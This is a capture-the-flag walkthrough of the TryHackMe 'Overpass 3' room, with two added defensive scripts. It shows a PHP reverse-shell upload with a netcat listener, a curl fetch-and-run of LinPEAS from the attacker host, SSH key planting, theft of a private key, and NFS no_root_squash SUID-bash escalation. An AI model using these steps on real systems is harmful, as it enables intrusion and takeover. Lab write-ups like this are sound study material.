- Room: Overpass 3 - Hosting
- Difficulty: Medium
- URL: https://tryhackme.com/room/overpass3hosting
After Overpass's rocky start in infosec, and the commercial failure of their password manager and subsequent hack, they've decided to try a new business venture. Overpass has become a web hosting company! Unfortunately, they haven't learned from their past mistakes. Rumour has it, their main web server is extremely vulnerable.
I started by looking at the open ports on the machine. The room description mentions a vulnerable web server, but there might be other interesting ports.
nmap -A -oN nmap.txt target

# Nmap 7.91 scan initiated Fri Mar 19 19:59:02 2021 as: nmap -A -oN nmap.txt target
Nmap scan report for target (10.10.146.68)
Host is up (0.62s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 de:5b:0e:b5:40:aa:43:4d:2a:83:31:14:20:77:9c:a1 (RSA)
|   256 f4:b5:a6:60:f4:d1:bf:e2:85:2e:2e:7e:5f:4c:ce:38 (ECDSA)
|_  256 29:e6:61:09:ed:8a:88:2b:55:74:f2:b7:33:ae:df:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.37 ((centos))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Overpass Hosting
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 20:00:36 2021 -- 1 IP address (1 host up) scanned in 93.72 seconds
The machine has ports 21 (FTP), 22 (SSH) and 80 (HTTP) open. Everything else in the top 1000 is filtered, which matters later when NFS comes into play.
I started by looking at the web site.
It's a static site without much on it. There is a list of names; maybe they can be used as usernames?
I found this little gem in the home page source code. Make sure you read the contract when your hosting company promises five nines.
We promise a 5 nines uptime, <!-- 0.99999% is 5 nines, right? -->and negotiable service level agreements down to of a matter of days to keep your business running smoothly even when technology gets in the way.
Other than the potential usernames, there was nothing I could use on the home page, and no links to other pages. Next, I tried finding hidden pages.
gobuster dir -e -u http://target.com/.com/ -t30 -w /usr/share/dirb/wordlists/common.txt | tee gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://target.com/.com/
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/03/19 20:05:35 Starting gobuster in directory enumeration mode
===============================================================
http://target.com/.com/.htpasswd (Status: 403) [Size: 218]
http://target.com/.com/.hta (Status: 403) [Size: 213]
http://target.com/.com/.htaccess (Status: 403) [Size: 218]
http://target.com/.com/backups (Status: 301) [Size: 230] [--> http://target.com//backups/]
http://target.com//cgi-bin/ (Status: 403) [Size: 217]
http://target.com//index.html (Status: 200) [Size: 1770]
===============================================================
2021/03/19 20:06:20 Finished
===============================================================
Gobuster found three folders.
The backups folder contained a file called backup.zip. I downloaded the file and uncompressed it. It contained an encrypted xlsx file, and the private key to decrypt it.
I imported the key, then used it to decrypt the file.
$ unzip backup.zip
Archive:  backup.zip
 extracting: CustomerDetails.xlsx.gpg
  inflating: priv.key
$ gpg --import priv.key
gpg: key C9AE71AB3180BC08: public key "Paradox <email@example.com>" imported
gpg: key C9AE71AB3180BC08: secret key imported
gpg: Total number processed: 1
gpg:               imported: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
$ gpg --decrypt CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
gpg: encrypted with 2048-bit RSA key, ID 9E86A1C63FB96335, created 2020-11-08
      "Paradox <firstname.lastname@example.org>"
$ file CustomerDetails.xlsx
CustomerDetails.xlsx: Microsoft Excel 2007+
The spreadsheet contains customer names, usernames, passwords and credit card information, all in clear text.
| Customer Name   | Username       | Password | Credit card number  | CVC |
|-----------------|----------------|----------|---------------------|-----|
| Par. A. Doxx    | paradox        | PASSWORD | 4111 1111 4555 1142 | 432 |
| 0day Montgomery | 0day           | PASSWORD | 5555 3412 4444 1115 | 642 |
| Muir Land       | muirlandoracle | PASSWORD | 5103 2219 1119 9245 | 737 |
The /icons folder contained some icons and some text explaining their use. It seems to be the default Apache icon directory (Nmap identified version 2.4.37).
/cgi-bin/ did not have directory listing enabled.
I ran Gobuster on the three folders it found, but it did not find anything else of interest.
Getting a Shell
I had a bunch of credentials, so I tried them on the FTP server to see if any of them worked.
I tried paradox's credentials first and they worked. The FTP root contained the source of the website and the backups folder with backup.zip in it.
The other 2 sets of credentials did not work.
I also tried the credentials over SSH. They were all rejected.
I connected back to the FTP server as paradox and took a closer look at the listing to see if I had missed anything.
ftp target
Connected to target.
220 (vsFTPd 3.0.3)
Name (target:ehogue): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 48       48             94 Mar 20 15:26 .
drwxrwxrwx    3 48       48             94 Mar 20 15:26 ..
drwxr-xr-x    2 48       48             24 Nov 08 21:25 backups
-rw-r--r--    1 0        0           65591 Nov 17 20:42 hallway.jpg
-rw-r--r--    1 0        0            1770 Nov 17 20:42 index.html
-rw-r--r--    1 0        0             576 Nov 17 20:42 main.css
-rw-r--r--    1 0        0            2511 Nov 17 20:42 overpass.svg
The directory itself is mode 777 (owned by uid 48), so it looked writable. I tried uploading a file and it worked. I didn't know which language, if any, the server would execute, so I uploaded a simple PHP file to see whether it would be interpreted or whether the code would just be printed.
cat test.php
<?php echo 'It works';
ftp> put test.php
local: test.php remote: test.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
24 bytes sent in 0.00 secs (40.4095 kB/s)
Uploading the file worked. I then opened http://target.com/test.php in a browser and the page showed 'It works', which confirmed that PHP code was executed. So the FTP directory is the web root, it is writable by the FTP user, and PHP runs from it: that combination is the real vulnerability here.
To get a shell on the server, I uploaded the PHP reverse shell from /usr/share/webshells/php/php-reverse-shell.php (after setting the $ip and $port variables in the script to point at my listener), started a Netcat listener on my machine and navigated to http://target.com/php-reverse-shell.php .
nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.30.1 35038
Linux ip-10-10-30-1 4.18.0-193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:35:48 up  2:15,  0 users,  load average: 0.00, 0.00, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: cannot set terminal process group (896): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ whoami
apache
sh-4.4$ pwd
/
sh-4.4$ cd
sh-4.4$ pwd
/usr/share/httpd
sh-4.4$ ls -l
total 20
drwxr-xr-x. 3 root root 4096 Nov  8  2020 error
drwxr-xr-x. 3 root root 8192 Nov  8  2020 icons
drwxr-xr-x. 3 root root  140 Nov  8  2020 noindex
-rw-r--r--. 1 root root   38 Nov 17  2020 web.flag
sh-4.4$ cat web.flag
WEB FLAG
I had access to the machine, and the first flag.
Escalation to paradox
Now that I had access to the server, I needed to get access to a user account.
There are two users on the server: james and paradox. I had the passwords from the spreadsheet, so I tried them with su. The credentials for paradox worked. None of the passwords worked for james.
$ su paradox
Password:
[paradox@ip-10-10-30-1 /]$ whoami
paradox
I added my public key to paradox's authorized_keys so I could reconnect directly over SSH, appending rather than overwriting so any existing key is kept, and with the permissions sshd expects on the directory and the file.

mkdir -p ~/.ssh && chmod 700 ~/.ssh
echo "MY_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Getting the User Flag
The home folder for paradox contains files with the customer information we found in the backups folder of the web site.
ssh paradox@target
Last login: Sat Mar 20 17:00:24 2021
[paradox@ip-10-10-30-1 ~]$ ls -la
total 56
drwx------. 4 paradox paradox   203 Nov 18 18:29 .
drwxr-xr-x. 4 root    root       34 Nov  8 19:34 ..
-rw-rw-r--. 1 paradox paradox 13353 Nov  8 21:23 backup.zip
lrwxrwxrwx. 1 paradox paradox     9 Nov  8 21:45 .bash_history -> /dev/null
-rw-r--r--. 1 paradox paradox    18 Nov  8  2019 .bash_logout
-rw-r--r--. 1 paradox paradox   141 Nov  8  2019 .bash_profile
-rw-r--r--. 1 paradox paradox   312 Nov  8  2019 .bashrc
-rw-rw-r--. 1 paradox paradox 10019 Nov  8 20:37 CustomerDetails.xlsx
-rw-rw-r--. 1 paradox paradox 10366 Nov  8 21:18 CustomerDetails.xlsx.gpg
drwx------. 4 paradox paradox   132 Nov  8 21:18 .gnupg
-rw-------. 1 paradox paradox  3522 Nov  8 21:16 priv.key
drwx------  2 paradox paradox    47 Nov 18 18:32 .ssh
I couldn't tell if they were the same versions I had found earlier, so I used scp to download them to my box and look at them.
$ scp paradox@target:~/backup.zip .
$ scp paradox@target:~/CustomerDetails.xlsx .
$ scp paradox@target:~/CustomerDetails.xlsx.gpg .
This gave me 3 versions of the CustomerDetails spreadsheet. One directly in the home folder, one encrypted, and one in the zip file. They all appeared to contain the same data. So I had to keep looking.
I spent some time looking around the server and did not find anything, so I decided to see whether LinPEAS would find something.
I started a web server on my machine.
sudo python3 -m http.server 80
Then I used it to download the script onto the target server and ran it.
curl http://10.13.3.36/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeasRes.txt
Since LinPEAS takes some time to run and outputs a lot of data, I always redirect its output to a file. This way I can go back to it later, and I can download it to my machine.
Note that LinPEAS produces coloured output (ANSI escape codes), so the saved file is hard to read in a plain text editor. Use less -r linpeasRes.txt to read it with the colours rendered.
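As an added example that is not part of the original write-up, here is a small POSIX shell helper that strips the ANSI escape sequences from a saved LinPEAS log so it can be grepped or opened in an ordinary editor. The sample line it runs on is constructed for the example and is not output captured from the room.

```shell
#!/bin/sh
# Added example, not from the original write-up: strip ANSI colour codes
# from a saved LinPEAS log (or any other coloured tool output).

# strip_ansi: read stdin, write stdout with CSI sequences removed.
# A CSI sequence is ESC '[' followed by parameter bytes (digits, ';', '?')
# and a final letter, e.g. "\033[1;31m" (bold red), "\033[0m" (reset)
# or "\033[K" (clear to end of line). The literal ESC byte is produced
# with printf so the function does not depend on sed understanding \x1b.
strip_ansi() {
    esc=$(printf '\033')
    sed -E "s/${esc}\[[0-9;?]*[A-Za-z]//g"
}

# Constructed sample that imitates a highlighted LinPEAS line; it is not
# real output from the target.
SAMPLE_LINE=$(printf '\033[1;31m[+] Possible NFS misconfiguration\033[0m in /etc/exports')

# Usage on a real log:  strip_ansi < linpeasRes.txt > linpeas-plain.txt
printf '%s\n' "$SAMPLE_LINE" | strip_ansi
# -> [+] Possible NFS misconfiguration in /etc/exports
```

Lines without escape codes pass through unchanged, so the helper is safe to run over the whole file before grepping for keywords such as no_root_squash.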
LinPEAS flagged a possible problem with the NFS export configuration, along with a link to a page describing how to abuse it.
The provided link has two possible exploits, one for remote, and one for local exploitation.
I tried running the remote exploit, but I couldn't connect. The NFS port is not reachable from the outside: the Nmap scan showed everything except 21, 22 and 80 as filtered.
root@kali:~# mkdir /tmp/pe
root@kali:~# mount -t nfs target:/ /tmp/pe
mount.nfs: Connection timed out
I tried the local exploit, but the target machine does not have gcc installed. The page notes that the remote exploit also works through an SSH tunnel, so I decided to try that first.
I looked for the port used by NFS.
[paradox@ip-10-10-237-235 ~]$ rpcinfo -p | grep nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    3   tcp   2049  nfs_acl
And opened an SSH tunnel for this port. Forwarding 2049 alone is enough for an NFSv4 mount; an NFSv3 mount would also need portmapper (111) and mountd reachable.

ssh -L 2049:localhost:2049 paradox@target
Then I followed the instructions to mount the NFS share locally as root.
root@kali:~# sudo apt install libnfs-utils
root@kali:~# mount -t nfs localhost:/ /tmp/pe
root@kali:~# ls /tmp/pe/
user.flag
root@kali:~# cat /tmp/pe/user.flag
USER FLAG
I now had james' home folder mounted locally, with the user flag in it.
To get root, I followed the HackTricks instructions: copy a bash binary into the mounted share as root and set the SUID bit on it.
$ cd /tmp/pe
$ cp /bin/bash .
$ chmod +s bash
Because the export uses the no_root_squash option, my local root user is not mapped to nobody on the server side, so james' home folder now contained a bash executable owned by root with the SUID bit set. If james ran it, it would run as root.
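The fix on the defensive side is to find and remove no_root_squash from the exports file. As an added example that is not part of the original write-up, here is a POSIX shell script that audits an exports file for that option and prints a corrected version. The exports content it runs on is constructed for the example; on a real host you would point check_exports at /etc/exports.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit an NFS exports file
# for no_root_squash and emit a corrected copy.

# check_exports FILE
# Prints one line "<path> <client> <options>" for every export entry that
# carries no_root_squash. Comments and blank lines are ignored. Globbing is
# switched off while splitting so a client spec such as "*" is never
# expanded against the local filesystem.
check_exports() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1" | (
        set -f
        while read -r path rest; do
            for spec in $rest; do
                case "$spec" in
                    *no_root_squash*)
                        client=${spec%%\(*}
                        opts=${spec#*\(}
                        opts=${opts%\)}
                        printf '%s %s %s\n' "$path" "$client" "$opts"
                        ;;
                esac
            done
        done
    )
}

# fix_exports FILE
# Writes FILE to stdout with no_root_squash replaced by root_squash, so a
# remote root is mapped to the anonymous user and can no longer plant
# root-owned SUID binaries through the mount. Review the output before
# installing it over /etc/exports and run "exportfs -ra" afterwards.
fix_exports() {
    sed -e 's/no_root_squash/root_squash/g' "$1"
}

# Constructed sample exports file. The first entry mirrors the pattern in
# the room (a home directory exported to everyone with no_root_squash); the
# second is correctly squashed; the third is a commented-out entry that the
# audit must ignore.
SAMPLE_EXPORTS='/home/james *(rw,sync,no_root_squash)
/srv/share 10.0.0.0/24(ro,sync,root_squash)
# /old/share *(rw,no_root_squash)
'

tmp=$(mktemp)
printf '%s' "$SAMPLE_EXPORTS" > "$tmp"
echo "Exports with no_root_squash:"
check_exports "$tmp"
# -> /home/james * rw,sync,no_root_squash
echo "Corrected file:"
fix_exports "$tmp"
rm -f "$tmp"
```

Even after the export is fixed, any SUID binary already dropped into the share stays dangerous until it is removed, so a follow-up find over the exported directories for files with the SUID bit set belongs in the same clean-up.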
I did not have james' password, but since I had his home folder mounted, I could read his SSH private key and use it to connect to the server as james.
$ ls /tmp/pe/.ssh/
authorized_keys  id_rsa  id_rsa.pub
$ ssh james@target -i /tmp/pe/.ssh/id_rsa
Last failed login: Sat Jun  5 13:55:53 BST 2021 on pts/1
There were 4 failed login attempts since the last successful login.
Last login: Wed Nov 18 18:26:00 2020 from 192.168.170.145
Once connected, I ran the SUID copy of bash with -p to become root and get the last flag. The -p flag matters: without it, bash notices that the effective UID differs from the real UID and drops the privileges. The libtinfo warning below is harmless here; it appears because the binary was copied from a Kali box with a newer bash than the CentOS target has.
[james@ip-10-10-237-235 ~]$ ./bash -p
./bash: /lib64/libtinfo.so.6: no version information available (required by ./bash)
bash-5.1# whoami
root
bash-5.1# cat /root/root.flag
ROOT FLAG
The Overpass Series
That was the last room of the Overpass series. I did the first two a while ago. From memory they were easier than this one. I should probably redo them and write them up as well.
I really enjoyed the series, thanks to NinjaJc01 for creating it.